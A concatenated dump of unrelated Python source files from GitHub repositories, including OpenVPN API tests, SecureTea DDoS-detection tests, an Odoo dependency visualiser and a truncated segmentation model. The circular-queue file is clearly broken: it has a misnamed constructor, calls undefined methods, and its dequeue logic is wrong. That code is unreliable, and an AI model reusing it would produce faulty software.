for the current page\n current_page = enum_link_list[start_index:end_index] \n try:\n for i in range(page_size):\n text = \"{} - {} of {}\\n{}\".format(\n page_number,\n page_size,\n len(filename),\n \"\\n\".join(current_page)\n )\n \n await update.message.reply_text(\n text,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN\n )\n except (BadRequest, IndexError, AttributeError) as e:\n if link:\n await update.message.reply_text(\n \"use this bot to download songs: \\nt.me/decr8test_bot\"\n )\n else:\n await update.message.reply_text(\n \"Not found.\\n\\n{}\".format(e)\n ) \n \n return msg_id, performer, title, filename, enum_link_list\n\nasync def search_buttons(\n update: Update,\n context: ContextTypes.DEFAULT_TYPE\n) -> None:\n\n global filename, msg_id, link_list, page_number, page_size, start_index, end_index\n \n query = update.callback_query\n \n # CallbackQueries need to be answered, even if no notification to the user is needed\n # Some clients may have trouble otherwise. 
See https://core.telegram.org/bots/api#callbackquery\n query.answer(text=\"🤖\") \n keyboard = [\n [\n InlineKeyboardButton(\"<\", callback_data=\"1\"),\n InlineKeyboardButton(\">\", callback_data=\"2\")\n ]\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n\n if query.data == \"1\":\n page_number -= 1\n start_index = (page_number - 1) * page_size\n end_index = start_index + page_size\n prev_page = enum_link_list[start_index:end_index]\n\n for i in range(page_size):\n text = \"{} - {} of {}\\n{}\".format(\n page_number,\n page_size,\n len(filename),\n \"\\n\".join(prev_page)\n )\n await query.edit_message_text(\n text,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN\n )\n \n elif query.data == '2':\n page_number += 1\n start_index = (page_number - 1) * page_size\n end_index = start_index + page_size\n next_page = enum_link_list[start_index:end_index]\n\n for i in range(page_size):\n text = \"{} - {} of {}\\n{}\".format(\n page_number,\n page_size,\n len(filename),\n \"\\n\".join(next_page)\n )\n # text += link_str\n \n await query.edit_message_text(\n text,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN\n )\n \nasync def inlinequery(\n update: Update,\n context: ContextTypes.DEFAULT_TYPE\n) -> None:\n \"\"\"Handle the inline query.\"\"\"\n query = update.inline_query.query\n results = []\n\n for k, v in data.items():\n if re.search(query, v.get(\"filename\"), re.IGNORECASE):\n results.append(\n InlineQueryResultAudio(\n id=uuid4(),\n audio_url=\"{}{}\".format(dcr8_url, k),\n title=\"{}\".format(v.get(\"title\"))\n ),\n ) \n await update.inline_query.answer(results, auto_pagination=True)\n\nasync def cancel(update: Update, context: ContextTypes.DEFAULT_TYPE) -> int:\n \"\"\"Cancels and ends the conversation.\"\"\"\n user = update.message.from_user\n logger.info(\"User %s canceled the conversation.\", user.first_name)\n await update.message.reply_text(\n \"Bye!\", reply_markup=ReplyKeyboardRemove()\n )\n\n return ConversationHandler.END\n","repo_name":"Davicii-ii/decr8","sub_path":"api/bot_non_commands.py","file_name":"bot_non_commands.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39377966573","text":"import unittest\nimport socket\nfrom unittest.mock import patch, PropertyMock, ANY, MagicMock\nimport openvpn_status\nfrom openvpn_api.util import errors\nfrom openvpn_api.vpn import VPN, VPNType\n\n\ndef gen_mock_values(values):\n \"\"\"Generator to return the next value in a list of values on every call.\n\n >>> vals = gen_mock_values([1, 2, 3])\n >>> mocked_func.side_effect = lambda: next(vals)\n >>> mocked_func()\n 1\n >>> mocked_func()\n 2\n \"\"\"\n for value in values:\n yield value\n\n\nclass TestVPNModel(unittest.TestCase):\n \"\"\"Test the config file parser monitor.util.config_parser.ConfigParser\n \"\"\"\n\n def test_host_port_socket(self):\n with self.assertRaises(errors.VPNError) as ctx:\n VPN(host=\"localhost\", port=1234, unix_socket=\"file.sock\")\n self.assertEqual(\"Must specify either socket or host and port\", str(ctx.exception))\n\n def test_host_port(self):\n vpn = VPN(host=\"localhost\", port=1234)\n self.assertEqual(vpn._mgmt_host, \"localhost\")\n self.assertEqual(vpn._mgmt_port, 1234)\n self.assertEqual(vpn.type, VPNType.IP)\n self.assertEqual(vpn.mgmt_address, \"localhost:1234\")\n\n def test_socket(self):\n vpn = VPN(unix_socket=\"file.sock\")\n self.assertEqual(vpn._mgmt_socket, \"file.sock\")\n self.assertEqual(vpn.type, 
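The test module's `gen_mock_values` hands successive return values to a mock via `side_effect = lambda: next(vals)`. Note that `unittest.mock` also accepts an iterable directly as `side_effect`, which achieves the same one-value-per-call behavior; a standalone sketch (not part of the test suite itself):

```python
# unittest.mock consumes an iterable side_effect one value per call,
# which is what gen_mock_values + `lambda: next(vals)` emulates above.
from unittest.mock import MagicMock

recv = MagicMock(side_effect=["asd\n", "END\n"])
assert recv() == "asd\n"
assert recv() == "END\n"
# A third call raises StopIteration, so over-reads fail loudly in tests.
```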
VPNType.UNIX_SOCKET)\n self.assertEqual(vpn.mgmt_address, \"file.sock\")\n\n def test_initialisation(self):\n vpn = VPN(unix_socket=\"file.sock\")\n self.assertIsNone(vpn._release)\n self.assertIsNone(vpn._socket)\n\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_connect_ip_failure(self, mock_create_connection):\n vpn = VPN(host=\"localhost\", port=1234)\n mock_create_connection.side_effect = socket.error()\n with self.assertRaises(errors.ConnectError):\n vpn.connect()\n mock_create_connection.side_effect = socket.timeout()\n with self.assertRaises(errors.ConnectError):\n vpn.connect()\n\n @patch(\"openvpn_api.vpn.VPN.connect\")\n @patch(\"openvpn_api.vpn.VPN.disconnect\")\n def test_connection_manager(self, mock_disconnect, mock_connect):\n vpn = VPN(host=\"localhost\", port=1234)\n with vpn.connection():\n mock_connect.assert_called_once()\n mock_disconnect.assert_not_called()\n mock_connect.reset_mock()\n mock_connect.assert_not_called()\n mock_disconnect.assert_called_once()\n\n def test_send_command_disconnected(self):\n vpn = VPN(host=\"localhost\", port=1234)\n with self.assertRaises(errors.NotConnectedError):\n vpn.send_command(\"asd\")\n\n @patch(\"openvpn_api.vpn.VPN._socket_recv\")\n @patch(\"openvpn_api.vpn.VPN._socket_send\")\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_send_command(self, mock_create_connection, mock_socket_send, mock_socket_recv):\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.connect()\n mock_create_connection.assert_called_once_with((\"localhost\", 1234), timeout=ANY)\n mock_socket_recv.assert_called_once()\n mock_socket_recv.reset_mock()\n vals = gen_mock_values([\"asd\\n\", \"END\\n\"])\n mock_socket_recv.side_effect = lambda: next(vals)\n a = vpn.send_command(\"help\")\n mock_socket_send.assert_called_once_with(\"help\\n\")\n self.assertEqual(2, mock_socket_recv.call_count)\n self.assertEqual(a, \"asd\\nEND\\n\")\n\n @patch(\"openvpn_api.vpn.VPN._socket_recv\")\n @patch(\"openvpn_api.vpn.VPN._socket_send\")\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_send_command_kill(self, mock_create_connection, mock_socket_send, mock_socket_recv):\n # This test just makes sure we don't infinitely loop reading from socket waiting for END\n # Needs rewriting once we add methods for killing clients.\n # Example output from management interface:\n # client-kill 1\n # SUCCESS: client-kill command succeeded\n # kill 1.2.3.4:12345\n # SUCCESS: 1 client(s) at address 1.2.3.4:12345 killed\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.connect()\n mock_create_connection.assert_called_once_with((\"localhost\", 1234), timeout=ANY)\n mock_socket_recv.assert_called_once()\n mock_socket_recv.reset_mock()\n mock_socket_recv.return_value = \"SUCCESS: 1 client(s) at address 1.2.3.4:12345 killed\"\n vpn.send_command(\"kill 1.2.3.4:12345\")\n mock_socket_send.assert_called_once_with(\"kill 1.2.3.4:12345\\n\")\n mock_socket_recv.assert_called_once()\n mock_socket_send.reset_mock()\n mock_socket_recv.reset_mock()\n mock_socket_recv.return_value = \"SUCCESS: client-kill command succeeded\"\n vpn.send_command(\"client-kill 1\")\n mock_socket_send.assert_called_once_with(\"client-kill 1\\n\")\n mock_socket_recv.assert_called_once()\n\n @patch(\"openvpn_api.vpn.VPN._socket_recv\")\n @patch(\"openvpn_api.vpn.VPN._socket_send\")\n @patch(\"openvpn_api.vpn.socket.create_connection\")\n def test_send_sigterm(self, mock_create_connection, mock_socket_send, mock_socket_recv):\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.connect()\n 
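The assertions that follow rely on `send_command` reading from the socket until a terminator line arrives ("END" for ordinary queries, a "SUCCESS:" line for kill commands, as the kill test below documents). A generic read-until-terminator loop looks roughly like this (a sketch of the expected behavior, not the library's actual implementation):

```python
# Sketch: accumulate newline-terminated chunks until a terminator line is seen.
def read_until_end(recv, terminators=("END",)):
    data = ""
    while True:
        chunk = recv()
        data += chunk
        lines = chunk.strip().splitlines()
        last_line = lines[-1] if lines else ""
        if any(last_line.startswith(t) for t in terminators):
            return data

chunks = iter(["asd\n", "END\n"])
assert read_until_end(lambda: next(chunks)) == "asd\nEND\n"

chunks = iter(["SUCCESS: signal SIGTERM thrown"])
assert read_until_end(lambda: next(chunks), ("END", "SUCCESS:")).startswith("SUCCESS")
```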
mock_create_connection.assert_called_once_with((\"localhost\", 1234), timeout=ANY)\n mock_socket_recv.assert_called_once()\n mock_socket_recv.reset_mock()\n mock_socket_recv.return_value = \"SUCCESS: signal SIGTERM thrown\"\n vpn.send_sigterm()\n mock_socket_send.assert_called_once_with(\"signal SIGTERM\\n\")\n mock_socket_recv.assert_called_once()\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n def test__get_version(self, mock_send_command):\n vpn = VPN(host=\"localhost\", port=1234)\n mock_send_command.return_value = \"\"\"\nOpenVPN Version: OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\nManagement Version: 1\nEND\n \"\"\"\n self.assertEqual(\n vpn._get_version(),\n \"OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\",\n )\n mock_send_command.assert_called_once_with(\"version\")\n mock_send_command.reset_mock()\n mock_send_command.return_value = \"\"\n with self.assertRaises(errors.ParseError) as ctx:\n vpn._get_version()\n self.assertEqual(\"Unable to get OpenVPN version, no matches found in socket response.\", str(ctx.exception))\n mock_send_command.assert_called_once_with(\"version\")\n mock_send_command.reset_mock()\n mock_send_command.return_value = \"\"\"\nManagement Version: 1\nEND\n \"\"\"\n with self.assertRaises(errors.ParseError) as ctx:\n vpn._get_version()\n self.assertEqual(\"Unable to get OpenVPN version, no matches found in socket response.\", str(ctx.exception))\n mock_send_command.assert_called_once_with(\"version\")\n mock_send_command.reset_mock()\n\n @patch(\"openvpn_api.vpn.VPN._get_version\")\n def test_release(self, mock_get_version):\n vpn = VPN(host=\"localhost\", port=1234)\n self.assertIsNone(vpn._release)\n release_string = \"OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n mock_get_version.return_value = release_string\n self.assertEqual(vpn.release, release_string)\n self.assertEqual(vpn._release, release_string)\n mock_get_version.assert_called_once_with()\n mock_get_version.reset_mock()\n vpn._release = \"asd\"\n self.assertEqual(vpn.release, \"asd\")\n mock_get_version.assert_not_called()\n\n @patch(\"openvpn_api.vpn.VPN._get_version\")\n def test_version(self, mock_get_version):\n vpn = VPN(host=\"localhost\", port=1234)\n vpn._release = \"OpenVPN 2.4.4 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n self.assertEqual(vpn.version, \"2.4.4\")\n vpn._release = \"OpenVPN 1.2.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n self.assertEqual(vpn.version, \"1.2.3\")\n vpn._release = \"OpenVPN 11.22.33 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 5 2018\"\n self.assertEqual(vpn.version, \"11.22.33\")\n vpn._release = None\n mock_get_version.assert_not_called() # Check mock hasn't been triggered up to this point\n mock_get_version.return_value = None\n self.assertIsNone(vpn.version)\n mock_get_version.assert_called_once()\n mock_get_version.reset_mock()\n vpn._release = \"asd\"\n with self.assertRaises(errors.ParseError) as ctx:\n vpn.version()\n self.assertEqual(\"Unable to parse version from release string.\", str(ctx.exception))\n mock_get_version.assert_not_called()\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n @patch(\"openvpn_api.models.state.State.parse_raw\")\n 
def test_get_state(self, mock_parse_raw, mock_send_command):\n vpn = VPN(host=\"localhost\", port=1234)\n state = vpn.get_state()\n mock_send_command.assert_called_once_with(\"state\")\n mock_parse_raw.assert_called_once()\n self.assertIsNotNone(state)\n\n @patch(\"openvpn_api.vpn.VPN.release\", new_callable=PropertyMock)\n def test_cache(self, release_mock):\n \"\"\"Test caching VPN metadata works and clears correctly.\n \"\"\"\n vpn = VPN(host=\"localhost\", port=1234)\n vpn.cache_data()\n release_mock.assert_called_once()\n vpn._release = \"asd\"\n vpn.clear_cache()\n self.assertIsNone(vpn._release)\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n @patch(\"openvpn_api.models.stats.ServerStats.parse_raw\")\n def test_get_stats(self, mock_parse_raw, mock_send_command):\n vpn = VPN(host=\"localhost\", port=1234)\n stats = vpn.get_stats()\n mock_send_command.assert_called_once_with(\"load-stats\")\n mock_parse_raw.assert_called_once()\n self.assertIsNotNone(stats)\n\n @patch(\"openvpn_api.vpn.VPN.send_command\")\n def test_get_status(self, mock):\n vpn = VPN(host=\"localhost\", port=1234)\n mock.return_value = \"\"\"OpenVPN CLIENT LIST\nUpdated,Thu Jul 18 20:47:42 2019\nCommon Name,Real Address,Bytes Received,Bytes Sent,Connected Since\ntestclient,1.2.3.4:12345,123456789,123456789,Tue Jun 11 21:22:02 2019\nROUTING TABLE\nVirtual Address,Common Name,Real Address,Last Ref\n10.0.0.2,testclient,1.2.3.4:12345,Wed Jun 12 21:55:04 2019\nGLOBAL STATS\nMax bcast/mcast queue length,2\nEND\n\"\"\"\n status = vpn.get_status()\n mock.assert_called_once()\n self.assertIsInstance(status, openvpn_status.models.Status)\n self.assertEqual(len(status.client_list), 1)\n self.assertEqual(list(status.client_list.keys()), [\"1.2.3.4:12345\"])\n","repo_name":"Jamie-/openvpn-api","sub_path":"tests/test_vpn_model.py","file_name":"test_vpn_model.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"35"} +{"seq_id":"6793759857","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom securetea.lib.ids.r2l_rules.ddos import DDoS\nimport scapy.all as scapy\nfrom securetea.logger import SecureTeaLogger\n\ntry:\n # if python 3.x.x\n from unittest.mock import patch\nexcept ImportError: # python 2.x.x\n from mock import patch\n\n\nclass TestDDoS(unittest.TestCase):\n \"\"\"\n Test class for SecureTea IDS DDoS Attack Detection.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup class for TestDDoS.\n \"\"\"\n # Initialize DDoS object\n self.ddos = DDoS()\n self.pkt1 = scapy.ARP(op=2)\n\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n def test_classify_ddos(self, mock_time):\n \"\"\"\n Test classify_ddos.\n \"\"\"\n # Case 1: Classify as SISP\n mock_time.return_value = 10\n pkt = scapy.IP(src=\"192.168.0.1\") \\\n / scapy.TCP(dport=80)\n self.ddos.classify_ddos(pkt)\n l = len(self.ddos.sisp)\n self.assertEqual(l, 1)\n temp_dict = {\n \"count\": 1,\n \"ports\": [80],\n \"start_time\": 10\n }\n self.assertTrue(self.ddos.sisp.get(\"192.168.0.1\"))\n self.assertEqual(temp_dict,\n self.ddos.sisp[\"192.168.0.1\"])\n # Check if count increments by 1\n self.ddos.classify_ddos(pkt)\n self.assertEqual(self.ddos.sisp[\"192.168.0.1\"][\"count\"], 2)\n\n # Case2: Classify as SIMP\n pkt = scapy.IP(src=\"192.168.0.1\") \\\n / scapy.TCP(dport=90)\n self.ddos.classify_ddos(pkt)\n # IP entry should get deleted from SISP dict\n l = len(self.ddos.sisp)\n self.assertEqual(l, 0)\n\n l2 = len(self.ddos.simp)\n self.assertEqual(l2, 1)\n temp_dict = {\n 
\"count\": 3,\n \"ports\": [80, 90],\n \"start_time\": 10\n }\n self.assertTrue(self.ddos.simp.get(\"192.168.0.1\"))\n self.assertEqual(self.ddos.simp[\"192.168.0.1\"],\n temp_dict)\n\n @patch.object(SecureTeaLogger, 'log')\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n def test_detect_misp(self, mock_time, mock_log):\n \"\"\"\n Test detect_misp.\n \"\"\"\n mock_time.return_value = 10\n\n # Create packets with different IP\n # but with same ports\n self.ddos.sisp[\"127.0.0.1\"] = {\n \"count\": 1,\n \"ports\": [80],\n \"start_time\": 10\n }\n self.ddos.sisp[\"127.0.0.2\"] = {\n \"count\": 1,\n \"ports\": [80],\n \"start_time\": 10\n }\n self.ddos.detect_misp()\n\n # Check if MISP dict got updated\n temp_dict = {\n \"count\": 2,\n \"start_time\": 10\n }\n\n self.assertTrue(self.ddos.misp.get(80))\n self.assertEqual(self.ddos.misp[80], temp_dict)\n self.assertFalse(mock_log.called)\n\n # Replicate attack by increasing\n # the count beyond threshold\n self.ddos.misp[80][\"count\"] = 20000\n self.ddos.detect_misp()\n mock_log.assert_called_with(\"Possible Multiple IP Single Port DDoS attack detected\",\n logtype=\"warning\")\n\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n @patch.object(SecureTeaLogger, 'log')\n def test_detect_sisp(self, mock_log, mock_time):\n \"\"\"\n Test detect_sisp.\n \"\"\"\n # Case 1: Within the threshold\n self.ddos.sisp[\"192.168.0.1\"] = {\n \"count\": 1,\n \"start_time\": 10,\n \"ports\": [80]\n }\n self.assertFalse(mock_log.called)\n\n # Case 2: Replicate attack by increasing\n # the count beyond threshold\n self.ddos.sisp[\"192.168.0.1\"] = {\n \"count\": 20000,\n \"start_time\": 10,\n \"ports\": [80]\n }\n mock_time.return_value = 11\n self.ddos.detect_sisp()\n mock_log.assert_called_with(\"Possible Single IP Single Port DDoS attack\",\n logtype=\"warning\")\n\n @patch(\"securetea.lib.ids.r2l_rules.ddos.time.time\")\n @patch.object(SecureTeaLogger, 'log')\n def test_detect_simp(self, mock_log, mock_time):\n \"\"\"\n Test detect_simp.\n \"\"\"\n # Case 1: Threshold within the range\n self.ddos.simp[\"192.168.0.1\"] = {\n \"count\": 1,\n \"start_time\": 10,\n \"ports\": [80, 90]\n }\n mock_time.return_value = 11\n self.ddos.detect_simp()\n self.assertFalse(mock_log.called)\n\n # Case 2: Threshold beyond the range\n self.ddos.simp[\"192.168.0.1\"] = {\n \"count\": 20000,\n \"ports\": [80, 90],\n \"start_time\": 10\n }\n self.ddos.detect_simp()\n mock_log.assert_called_with(\"Possible Single IP Multiple Port DDoS attack\",\n logtype=\"warning\")\n\n @patch.object(SecureTeaLogger, 'log')\n def test_detect_mimp(self, mock_log):\n \"\"\"\n Test detect_mimp.\n \"\"\"\n # Replicate attack\n for _ in range(20000):\n ip = str(scapy.RandIP())\n self.ddos.simp[ip] = {\n \"count\": 1,\n \"start_time\": 10,\n \"ports\": [80, 90]\n }\n\n self.ddos.detect_mimp()\n mock_log.assert_called_with(\"Possible Multiple IP Multiple Port DDoS attack detected\",\n logtype=\"warning\")\n","repo_name":"OWASP/SecureTea-Project","sub_path":"test/test_ddos.py","file_name":"test_ddos.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"35"} +{"seq_id":"33681076538","text":"import os\nimport io\nimport sys\nimport tkinter as tk\nimport pygraphviz as pgv\nfrom functools import reduce\nfrom PIL import Image, ImageTk\n\nimport odoo\n\n# usage:\n# . 
venv/bin/activate\n# collect-dep.py --addons-path=...\n\nif __name__ == \"__main__\":\n args = sys.argv[1:]\n\n odoo.tools.config._parse_config(args)\n odoo.modules.initialize_sys_path()\n available_modules = set(odoo.modules.get_modules())\n required_modules = dict()\n dep_graph = {}\n for module in list(available_modules)[:]:\n if module.startswith((\"test_\", \"hw_\")):\n continue\n required_modules[module] = set(odoo.modules.load_information_from_description_file(module).get(\"depends\"))\n dep_graph[module] = dict((k, None) for k in required_modules[module])\n missing_modules = reduce(set.union, required_modules.values(), set()) - available_modules\n\n G = pgv.AGraph(dep_graph, directed=True, rankdir=\"BT\", ranksep=1.2, nodesep=0.3, ratio=\"fill\")\n G.node_attr.update(color=\"black\")\n\n for missing in missing_modules:\n n = G.get_node(missing)\n n.attr[\"color\"] = \"red\"\n n.attr[\"fontcolor\"] = \"red\"\n n.attr[\"penwidth\"] = 2.0\n def mark_predecessors(n):\n for p in G.predecessors_iter(n):\n #p.attr[\"color\"] = \"red\"\n p.attr[\"fontcolor\"] = \"red\"\n e = G.get_edge(p, n)\n e.attr[\"color\"] = \"red\"\n mark_predecessors(p)\n mark_predecessors(n)\n\n G.layout(\"dot\")\n G.unflatten()\n png = G.draw(format=\"png\")\n\n window = tk.Tk()\n frame = tk.Frame(window, bd=2)\n\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n\n xsb = tk.Scrollbar(frame, orient=tk.HORIZONTAL)\n xsb.grid(row=1, column=0, sticky=tk.E+tk.W)\n\n ysb = tk.Scrollbar(frame)\n ysb.grid(row=0, column=1, sticky=tk.N+tk.S)\n\n image = Image.open(io.BytesIO(png))\n img = ImageTk.PhotoImage(image)\n\n canvas = tk.Canvas(frame, height=img.height(), width=img.width(), bd=0, xscrollcommand=xsb.set, yscrollcommand=ysb.set)\n canvas.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)\n\n canvas.create_image(0,0,image=img, anchor=\"nw\")\n canvas.config(scrollregion=canvas.bbox(tk.ALL))\n xsb.config(command=canvas.xview)\n ysb.config(command=canvas.yview)\n\n canvas.bind('', lambda event: canvas.scan_mark(event.x, event.y))\n canvas.bind(\"\", lambda event: canvas.scan_dragto(event.x, event.y, gain=1))\n\n frame.pack()\n\n window.resizable(True, True)\n window.mainloop()\n","repo_name":"MarcoColombo71/collect-dep","sub_path":"collect-dep.py","file_name":"collect-dep.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12073387799","text":"maximum_classes_to_detect = 90\n\nmin_score_thresh = 0.0\n\ncategories_to_detect = ['car', 'motorcycle', 'airplane', 'bus', 'truck', 'traffic light', 'vehicle_registration_plate']\n\ndps = 20\n\n# Celery command\n# celery -A TVD worker -l info\n","repo_name":"Bublum/TVD","sub_path":"Dashboard/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14076065901","text":"class CircularQueue():\n\n def __int__(self, max=1000):\n self.max = max\n self.queue = [None] * self.max\n self.size = self.front = 0\n self.rear = None\n\n def is_empty(self):\n return self.size == 0\n\n def enqueue(self, data):\n if self.is_full():\n raise Exception(\"Queue is Full\")\n\n if self.rear == None:\n self.rear = 0\n else:\n self.rear = self.next_index(self.rear)\n\n self.queue[self.rear] = data\n self.size += 1\n return self.queue[self.rear]\n\n def deque(self):\n if self.is_empty():\n raise\n Exception('Queue is empty')\n 
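The `CircularQueue` in this record has several defects as written: `__int__` instead of `__init__` (so `max`, `queue`, `size`, `front`, and `rear` are never initialized), calls to undefined `is_full`/`next_index` helpers, a bare `raise` split from its `Exception(...)`, `deque` returning the slot *after* the one it clears without decrementing `size`, and `enqueu()` typos with missing arguments in the `__main__` block. A corrected minimal ring-buffer sketch:

```python
# Corrected minimal ring buffer (a sketch of what the record's code appears
# to intend, with the missing helpers and size bookkeeping filled in).
class CircularQueue:
    def __init__(self, max_size=8):
        self.max = max_size
        self.queue = [None] * self.max
        self.size = self.front = 0
        self.rear = None

    def next_index(self, i):
        return (i + 1) % self.max  # wrap around the fixed-size buffer

    def is_empty(self):
        return self.size == 0

    def is_full(self):
        return self.size == self.max

    def enqueue(self, data):
        if self.is_full():
            raise Exception("Queue is full")
        self.rear = 0 if self.rear is None else self.next_index(self.rear)
        self.queue[self.rear] = data
        self.size += 1
        return data

    def deque(self):
        if self.is_empty():
            raise Exception("Queue is empty")
        data = self.queue[self.front]       # capture before clearing the slot
        self.queue[self.front] = None
        self.front = self.next_index(self.front)
        self.size -= 1
        return data

q = CircularQueue()
q.enqueue(1); q.enqueue(2)
assert q.deque() == 1 and q.deque() == 2 and q.is_empty()
```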
self.queue[self.front] = None\n self.front = self.next_index(self.front)\n return self.queue[self.front]\n\n def display(self):\n print(self.queue)\n\nif __name__ == '__main__':\n cq = CircularQueue()\n cq.display()\n print(cq.enqueu())\n print(cq.enqueu())\n print(cq.enqueu())\n print(cq.enqueu())\n cq.display()\n print(cq.deque())\n print(cq.deque())\n cq.display()\n print(cq.enqueue())\n print(cq.enqueue())\n cq.display()","repo_name":"chemica1/traidingBot","sub_path":"circle_queue.py","file_name":"circle_queue.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2372475854","text":"import z3\nimport klara\n\n\nclass Z3Proxy(klara.InferProxy):\n def __init__(self, z3_expr):\n super(Z3Proxy, self).__init__(z3_expr)\n\n def __k_add__(self, other: klara.Const):\n \"\"\"represent __add__ dunder method\"\"\"\n left = self.value\n right = other.value\n expr = left + right\n # we'll create a new Z3Proxy, wrapping the new expression\n return klara.inference.InferenceResult.load_result(Z3Proxy(expr))\n\n def __k_eq__(self, other: klara.Const):\n left = self.value\n right = other.value\n expr = left == right\n return klara.inference.InferenceResult.load_result(Z3Proxy(expr))\n\n def __k_bool__(self):\n yield klara.inference.InferenceResult(self, status=True)\n\n\nAST2Z3TYPE_MAP = {\"int\": z3.Int, \"float\": z3.Real, \"bool\": z3.Bool, \"str\": z3.String}\n\n\n@klara.inference.inference_transform_wrapper\ndef _infer_arg(node: klara.Arg, context):\n name = node.arg\n z3_var_type = AST2Z3TYPE_MAP[str(node.annotation)]\n z3_var = z3_var_type(name)\n proxy = Z3Proxy(z3_var)\n yield klara.inference.InferenceResult.load_result(proxy)\n\n\nklara.MANAGER.register_transform(klara.Arg, _infer_arg)\n\nsource = \"\"\"\n def foo(a: int):\n return a + 2 == 12\n \"\"\"\ntree = klara.parse(source)\nfor res in tree.body[0].infer_return_value():\n z3.solve(res.result.value)\n","repo_name":"usagitoneko97/klara","sub_path":"klara/examples/infer_z3.py","file_name":"infer_z3.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"35"} +{"seq_id":"6543826577","text":"from skimage import io\nimport numpy as np\nimport os\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.applications import *\nfrom tensorflow.keras.applications.xception import preprocess_input\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport tensorflow.keras.backend as K\nimport copy\n\n\nLABEL_DICT = {'background': 0, 'normal': 1, 'stroke': 2}\nCOLOR_DICT = {'background': (0, 0, 0), 'normal': (0, 255, 0), 'stroke': (255, 0, 0)}\n\n\ndef ConvAndBatch(x, n_filters=64, kernel=(2, 2), strides=(1, 1), padding='valid', activation='relu'):\n filters = n_filters\n\n conv_ = Conv2D(filters=filters,\n kernel_size=kernel,\n strides=strides,\n padding=padding)\n\n batch_norm = BatchNormalization()\n\n activation = Activation(activation)\n\n x = conv_(x)\n x = batch_norm(x)\n x = activation(x)\n\n return x\n\n\ndef ConvAndAct(x, n_filters, kernel=(1, 1), activation='relu', pooling=False):\n poolingLayer = AveragePooling2D(pool_size=(1, 1), padding='same')\n convLayer = Conv2D(filters=n_filters,\n kernel_size=kernel,\n strides=1)\n\n activation = Activation(activation)\n\n if pooling:\n x = poolingLayer(x)\n\n x = convLayer(x)\n x = 
activation(x)\n\n return x\n\n\ndef AttentionRefinmentModule(inputs, n_filters):\n filters = n_filters\n\n poolingLayer = AveragePooling2D(pool_size=(1, 1), padding='same')\n\n x = poolingLayer(inputs)\n x = ConvAndBatch(x, kernel=(1, 1), n_filters=filters, activation='sigmoid')\n\n return multiply([inputs, x])\n\n\ndef FeatureFusionModule(input_f, input_s, n_filters):\n concatenate = Concatenate(axis=-1)([input_f, input_s])\n\n branch0 = ConvAndBatch(concatenate, n_filters=n_filters, kernel=(3, 3), padding='same')\n branch_1 = ConvAndAct(branch0, n_filters=n_filters, pooling=True, activation='relu')\n branch_1 = ConvAndAct(branch_1, n_filters=n_filters, pooling=False, activation='sigmoid')\n\n x = multiply([branch0, branch_1])\n return Add()([branch0, x])\n\n\ndef ContextPath(layer_13, layer_14):\n globalmax = GlobalAveragePooling2D()\n\n block1 = AttentionRefinmentModule(layer_13, n_filters=1024)\n block2 = AttentionRefinmentModule(layer_14, n_filters=2048)\n\n global_channels = globalmax(block2)\n block2_scaled = multiply([global_channels, block2])\n\n block1 = UpSampling2D(size=(4, 4), interpolation='bilinear')(block1)\n block2_scaled = UpSampling2D(size=(4, 4), interpolation='bilinear')(block2_scaled)\n\n cnc = Concatenate(axis=-1)([block1, 